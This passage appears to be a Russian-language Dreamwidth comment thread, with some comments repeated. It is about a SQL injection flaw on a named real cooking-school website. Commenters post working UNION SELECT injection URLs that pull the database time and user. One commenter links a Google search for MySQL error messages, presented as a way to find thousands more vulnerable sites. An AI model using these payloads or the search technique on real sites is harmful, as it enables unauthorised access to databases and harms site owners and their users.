а вот, например - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,NOW(),null,null,null,null,null,null или вот - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,USER(),null,null,null,null,null,null
это не просто SQL Injection, это "заходи, кто хочешь, бери, что хочешь" :)
И? Если подумать и чуть-чуть подправить мою ссылку - можно получить ещё десяток тысяч таких сайтов. Это какая-то новость для кого-то? Если cooksacademy для Вас чем-то особенный сайт - написали бы его владельцам, чтобы они поправили. Если просто ещё один из - я не понимаю восторга.
![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
![[identity profile]](https://www.dreamwidth.org/img/silk/identity/openid.png){kind=small}
no subject
http://www.google.ru/search?hl=ru&q=%22You+have+an+error+in+your+SQL+syntax%3B+check+the+manual+that+corresponds+to+your+MySQL+server+version%22&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=
no subject
или вот - http://www.cooksacademy.com/course.php?intCategoryID=87+union+select+null,USER(),null,null,null,null,null,null
это не просто SQL Injection, это "заходи, кто хочешь, бери, что хочешь" :)
no subject
Если подумать и чуть-чуть подправить мою ссылку - можно получить ещё десяток тысяч таких сайтов. Это какая-то новость для кого-то? Если cooksacademy для Вас чем-то особенный сайт - написали бы его владельцам, чтобы они поправили. Если просто ещё один из - я не понимаю восторга.
no subject
no subject
no subject
так что ценность от этого injection не больше чем от найденного на дороге каталога.
no subject